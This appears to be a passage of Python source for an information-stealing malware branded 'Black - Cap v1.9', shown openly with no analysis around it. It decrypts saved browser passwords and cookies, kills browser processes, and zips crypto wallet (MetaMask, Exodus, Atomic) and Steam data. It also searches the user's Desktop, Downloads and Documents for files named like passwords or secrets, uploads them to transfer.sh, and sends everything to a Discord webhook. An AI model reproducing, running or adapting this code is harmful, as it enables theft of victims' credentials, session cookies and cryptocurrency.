    return buffer.raw

def CryptUnprotectData(encrypted_bytes, entropy=b''):
    buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
    buffer_entropy = c_buffer(entropy, len(entropy))
    blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
    blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
    blob_out = DATA_BLOB()

    if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
        return GetData(blob_out)

def DecryptValue(buff, master_key=None):
    starts = buff.decode(encoding='utf8', errors='ignore')[:3]
    if starts == 'v10' or starts == 'v11':
        iv = buff[3:15]
        payload = buff[15:]
        cipher = AES.new(master_key, AES.MODE_GCM, iv)
        decrypted_pass = cipher.decrypt(payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass

def LoadRequests(methode, url, data='', files='', headers=''):
    for i in range(8):
        try:
            if methode == 'POST':
                if data != '':
                    r = requests.post(url, data=data)
                    if r.status_code == 200:
                        return r
                elif files != '':
                    r = requests.post(url, files=files)
                    if r.status_code == 200 or r.status_code == 413: # 413 = DATA TO BIG
                        return r
        except:
            pass

def LoadUrlib(hook, data='', files='', headers=''):
    for i in range(8):
        try:
            if headers != '':
                r = urlopen(Request(hook, data=data, headers=headers))
                return r
            else:
                r = urlopen(Request(hook, data=data))
                return r
        except:
            pass


def Trust(Cookies):
    global DETECTED
    data = str(Cookies)
    tim = re.findall(".google.com", data)
    if len(tim) < -1:
        DETECTED = True
        return DETECTED
    else:
        DETECTED = False
        return DETECTED




def Reformat(listt):
    e = re.findall("(\w+[a-z])",listt)
    while "https" in e: e.remove("https")
    while "com" in e: e.remove("com")
    while "net" in e: e.remove("net")
    return list(set(e))

def upload(name, tk=''):
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
    }

    if name == "blackcapedez":
        data = {
        "content": '',
        "embeds": [
            {
            "fields": [
                {
                "name": "Interesting files found on user PC:",
                "value": tk
                }
            ],
            "author": {
                'name': f'Black - Cap v1.9',
                'url': 'https://github.com/KSCHdsc',
                'icon_url': 'https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif'
            },
            "footer": {
                "text": "github.com/KSCHdsc"
            },
            'color': 374276,
            }
        ],
        "avatar_url": "https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png",
        "attachments": []
        }
        LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
        return

    path = name
    files = {'file': open(path, 'rb')}

    if "bc_allpasswords" in name:

        ra = ' | '.join(da for da in paswWords)

        if len(ra) > 1000:
            rrr = Reformat(str(paswWords))
            ra = ' | '.join(da for da in rrr)

        data = {
        "content": '',
        "embeds": [
            {
            "fields": [
                {
                "name": "Found:",
                "value": ra
                }
            ],
            "author": {
                'name': f'Black - Cap v1.9',
                'url': 'https://github.com/KSCHdsc',
                'icon_url': 'https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif'
            },
            "footer": {
                "text": "github.com/KSCHdsc",
            },
            'color': 374276,
            }
        ],
         "avatar_url": "https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png",
        "attachments": []
        }
        LoadUrlib(hook, data=dumps(data).encode(), headers=headers)

    if "bc_allcookies" in name:
        rb = ' | '.join(da for da in cookiWords)
        if len(rb) > 1000:
            rrrrr = Reformat(str(cookiWords))
            rb = ' | '.join(da for da in rrrrr)

        data = {
        "content": '',
        "embeds": [
            {
            "fields": [
                {
                "name": "Found:",
                "value": rb
                }
            ],
            "author": {
                'name': f'Black - Cap v1.9',
                'url': 'https://github.com/KSCHdsc',
                'icon_url': 'https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif'
            },
            "footer": {
                "text": "github.com/KSCHdsc",
            },
            'color': 374276,
            }
        ],
         "avatar_url": "https://media.discordapp.net/attachments/1023241847046418522/1032289976710352917/blackcap_2.png",
        "attachments": []
        }
        LoadUrlib(hook, data=dumps(data).encode(), headers=headers)

    LoadRequests("POST", hook, files=files)

def writeforfile(data, name):
    path = os.getenv("TEMP") + f"\{name}.txt"
    with open(path, mode='w', encoding='utf-8') as f:
        f.write(f"Created by KSCH | https://github.com/KSCHdsc\n\n")
        for line in data:
            if line[0] != '':
                f.write(f"{line}\n")



Passw = []
def getPassw(path, arg):
    global Passw
    if not os.path.exists(path): return

    pathC = path + arg + "/Login Data"
    if os.stat(pathC).st_size == 0: return

    tempfold = temp + "blackcaped" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
    shutil.copy2(pathC, tempfold)
    conn = connect(tempfold)
    cursor = conn.cursor()
    cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
    data = cursor.fetchall()
    cursor.close()
    conn.close()
    os.remove(tempfold)

    pathKey = path + "/Local State"
    with open(pathKey, 'r', encoding='utf-8') as f: local_state = loads(f.read())
    master_key = b64decode(local_state['os_crypt']['encrypted_key'])
    master_key = CryptUnprotectData(master_key[5:])

    for row in data:
        if row[0] != '':
            for wa in keyword:
                old = wa
                if "https" in wa:
                    tmp = wa
                    wa = tmp.split('[')[1].split(']')[0]
                if wa in row[0]:
                    if not old in paswWords: paswWords.append(old)
            Passw.append(f"URL: {row[0]} \n ID: {row[1]} \n PASSW0RD: {DecryptValue(row[2], master_key)}\n\n")
    writeforfile(Passw, 'bc_allpasswords')

Cookies = []
def getCookie(path, arg):
    global Cookies
    if not os.path.exists(path): return

    pathC = path + arg + "/Cookies"
    if os.stat(pathC).st_size == 0: return

    tempfold = temp + "blackcaped" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"

    shutil.copy2(pathC, tempfold)
    conn = connect(tempfold)
    cursor = conn.cursor()
    cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
    data = cursor.fetchall()
    cursor.close()
    conn.close()
    os.remove(tempfold)

    pathKey = path + "/Local State"

    with open(pathKey, 'r', encoding='utf-8') as f: local_state = loads(f.read())
    master_key = b64decode(local_state['os_crypt']['encrypted_key'])
    master_key = CryptUnprotectData(master_key[5:])

    for row in data:
        if row[0] != '':
            for wa in keyword:
                old = wa
                if "https" in wa:
                    tmp = wa
                    wa = tmp.split('[')[1].split(']')[0]
                if wa in row[0]:
                    if not old in cookiWords: cookiWords.append(old)
            Cookies.append(f" HOST KEY: {row[0]} | NAME: {row[1]} | VALUE: {DecryptValue(row[2], master_key)}")
    writeforfile(Cookies, 'bc_allcookies')




def ZipThings(path, arg, procc):
    pathC = path
    name = arg

    if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
        browser = path.split("\\")[4].split("/")[1].replace(' ', '')
        name = f"Metamask_{browser}"
        pathC = path + arg

    if not os.path.exists(pathC): return
    subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)

    if "Wallet" in arg or "NationsGlory" in arg:
        browser = path.split("\\")[4].split("/")[1].replace(' ', '')
        name = f"{browser}"

    elif "Steam" in arg:
        if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
        f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
        data = f.readlines()
        found = False
        for l in data:
            if 'RememberPassword"\t\t"1"' in l:
                found = True
        if found == False: return
        name = arg

    zf = zipfile.ZipFile(f"{pathC}/{name}.zip", "w")
    for file in os.listdir(pathC):
        if not ".zip" in file: zf.write(pathC + "/" + file)
    zf.close()

    upload(f'{pathC}/{name}.zip')
    os.remove(f"{pathC}/{name}.zip")


def GatherAll():
    '                   Default Path < 0 >                         ProcesName < 1 >        Token  < 2 >              Password < 3 >     Cookies < 4 >                          Extentions < 5 >                                  '
    browserPaths = [
        [f"{roaming}/Opera Software/Opera GX Stable",               "opera.exe",    "/Local Storage/leveldb",           "/",            "/Network",             "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"                      ],
        [f"{roaming}/Opera Software/Opera Stable",                  "opera.exe",    "/Local Storage/leveldb",           "/",            "/Network",             "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"                      ],
        [f"{roaming}/Opera Software/Opera Neon/User Data/Default",  "opera.exe",    "/Local Storage/leveldb",           "/",            "/Network",             "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"                      ],
        [f"{local}/Google/Chrome/User Data",                        "chrome.exe",   "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"              ],
        [f"{local}/Google/Chrome SxS/User Data",                    "chrome.exe",   "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"              ],
        [f"{local}/BraveSoftware/Brave-Browser/User Data",          "brave.exe",    "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"              ],
        [f"{local}/Yandex/YandexBrowser/User Data",                 "yandex.exe",   "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"                                    ],
        [f"{local}/Microsoft/Edge/User Data",                       "edge.exe",     "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"              ]
    ]



    PathsToZip = [
        [f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
        [f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
        ["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
        [f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"]
    ]


    for patt in browserPaths:
        a = threading.Thread(target=getPassw, args=[patt[0], patt[3]])
        a.start()
        Threadlist.append(a)

    ThCokk = []
    for patt in browserPaths:
        a = threading.Thread(target=getCookie, args=[patt[0], patt[4]])
        a.start()
        ThCokk.append(a)

    for thread in ThCokk: thread.join()
    DETECTED = Trust(Cookies)
    if DETECTED == True: return

    for patt in browserPaths:
        threading.Thread(target=ZipThings, args=[patt[0], patt[5], patt[1]]).start()

    for patt in PathsToZip:
        threading.Thread(target=ZipThings, args=[patt[0], patt[2], patt[1]]).start()

    for thread in Threadlist:
        thread.join()
    global upths
    upths = []

    for file in ["bc_allpasswords.txt", "bc_allcookies.txt"]:
        upload(os.getenv("TEMP") + "\\" + file)


def uploadToAnonfiles(path):
    try:

        files = { "file": (path, open(path, mode='rb')) }
        ...
        upload = requests.post("https://transfer.sh/", files=files)
        url = upload.text
        return url
    except:
        return False

def blackcapedezFolder(pathF, keywords):
    global blackcapedezFiles
    maxfilesperdir = 7
    i = 0
    listOfFile = os.listdir(pathF)
    ffound = []
    for file in listOfFile:
        if not os.path.isfile(pathF + "/" + file): return
        i += 1
        if i <= maxfilesperdir:
            url = uploadToAnonfiles(pathF + "/" + file)
            ffound.append([pathF + "/" + file, url])
        else:
            break
    blackcapedezFiles.append(["folder", pathF + "/", ffound])

blackcapedezFiles = []
def blackcapedezFile(path, keywords):
    global blackcapedezFiles
    fifound = []
    listOfFile = os.listdir(path)
    for file in listOfFile:
        for worf in keywords:
            if worf in file.lower():
                if os.path.isfile(path + "/" + file) and ".txt" in file:
                    fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
                    break
                if os.path.isdir(path + "/" + file):
                    target = path + "/" + file
                    blackcapedezFolder(target, keywords)
                    break

    blackcapedezFiles.append(["folder", path, fifound])

def blackcapedez():
    user = temp.split("\AppData")[0]
    path2search = [
        user + "/Desktop",
        user + "/Downloads",
        user + "/Documents"
    ]

    key_wordsFolder = [
        "account",
        "acount",
        "passw",
        "secret"

    ]

    key_wordsFiles = [
        "passw",
        "mdp",
        "motdepasse",
        "mot_de_passe",
        "login",
        "secret",
        "account",
        "acount",
        "paypal",
        "banque",
        "account",
        "metamask",
        "wallet",
        "crypto",
        "exodus",
        "discord",
        "2fa",
        "code",
        "memo",
        "compte",
        "token",
        "backup",
        "seecret"
        ]

    wikith = []
    for patt in path2search:
        blackcapedez = threading.Thread(target=blackcapedezFile, args=[patt, key_wordsFiles]);blackcapedez.start()
        wikith.append(blackcapedez)
    return wikith


global keyword, cookiWords, paswWords

keyword = [
    'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
]


cookiWords = []
paswWords = []

GatherAll()
DETECTED = Trust(Cookies)

if not DETECTED:
    wikith = blackcapedez()

    for thread in wikith: thread.join()
    time.sleep(0.2)

    filetext = "\n"
    for arg in blackcapedezFiles:
        if len(arg[2]) != 0:
            foldpath = arg[1]
            foldlist = arg[2]
            filetext += f"```diff\n- {foldpath}\n"

            for ffil in foldlist:
                a = ffil[0].split("/")
                fileanme = a[len(a)-1]
                b = ffil[1]
                filetext += f"+ Name: {fileanme}\n+ Link: {b}\n```"
            filetext += "\n"
    upload("blackcapedez", filetext)